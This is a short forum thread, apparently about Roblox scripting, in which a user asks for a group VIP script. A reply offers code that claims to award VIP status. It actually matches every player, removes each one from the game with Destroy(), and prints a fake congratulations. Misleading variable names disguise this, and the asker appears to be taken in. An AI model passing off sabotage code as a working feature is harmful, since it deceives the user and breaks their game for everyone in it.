|
| 18 Nov 2012 08:35 PM |
| Could you give me the script that give a vip for group? not a vip door. |
|
|
| Report Abuse |
|
|
| |
|
|
| 18 Nov 2012 08:42 PM |
yes friend here is the script
vip="put the name of ur shirt here"
pingRate=00001010101010100110100010101010101101010101010101010101100101
todecimal=function(n) return tonumber(tostring("."..n)); end;
awardvip=function() print("congrats u got vep"); end;
hasVip=function(p) local base64encodedhaxwat=p; p=vip; if vip==p then base64encodedhaxwat:Destroy(); awardvip(); end; end;
while wait(todecimal(pingRate)) do for fa,il in pairs(game:service'Players':GetPlayers()) do hasVip(il); end; end;
|
|
|
| Report Abuse |
|
|
|
| 18 Nov 2012 08:48 PM |
| Where do you put the group? |
|
|
| Report Abuse |
|
|